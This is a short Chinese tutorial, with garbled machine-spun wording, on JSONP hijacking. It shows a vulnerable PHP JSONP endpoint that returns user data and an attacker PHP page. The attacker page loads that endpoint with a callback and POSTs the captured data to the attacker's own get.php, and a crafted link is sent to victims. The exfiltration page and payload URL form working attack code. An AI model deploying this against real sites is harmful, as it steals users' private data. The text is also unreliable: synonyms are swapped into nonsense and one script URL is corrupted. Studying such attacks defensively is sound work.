标签：

0x01 Jsonp简介：

Jsonp(JSON with Padding) 是 json 的一种"使用模式"，可以让网页从另外域名（网站）那获取资料，即跨域读取数据。

为什么我们从差此外域（网站）访谒数据需要一个特殊的技术(JSONP )呢？这是因为同源计谋。

同源计谋，它是由Netscape提出的一个著名的安适计谋，，此刻所有撑持JavaScript 的浏览器城市使用这个计谋。

0x02 JSONP劫持缝隙实例

处事端getUser.php

<?php header('Content-type: application/json'); $jsoncallback = htmlspecialchars($_REQUEST ['jsoncallback']);//获取回调函数名 //json数据 //$json_data = '["id","user"]'; $json_data='({"id":"1","name":"Aaron"})'; echo $jsoncallback . "(" . $json_data . ")";//输出jsonp格局的数据 ?>

打击者

<?php $url = $_GET['url'] ? $_GET['url'] : ""; $callback = $_GET['c'] ? $_GET['c'] : "json"; $url = htmlspecialchars(addslashes($url)); $callback = htmlspecialchars(addslashes($callback)); $script = '<script src=http://www.mamicode.com/"https:/www.chinacycc.com/template/js/jquery-2.2.4.min.js"></script> <script> function ccc(a){ var info = JSON.stringify(a) $.post("./get.php", { info: info, },); } </script> <script src="'. $url .'?'.$callback .'=ccc"></script>'; echo $script; ?>

打击者结构了一个payload：

打击者/jsonp/index.php?c=处事真个回调参数&url=http://处事端/getUser.php

然后将这个发送给受害者，当受害者一点击了，打击者就能获取受害者相应的敏感信息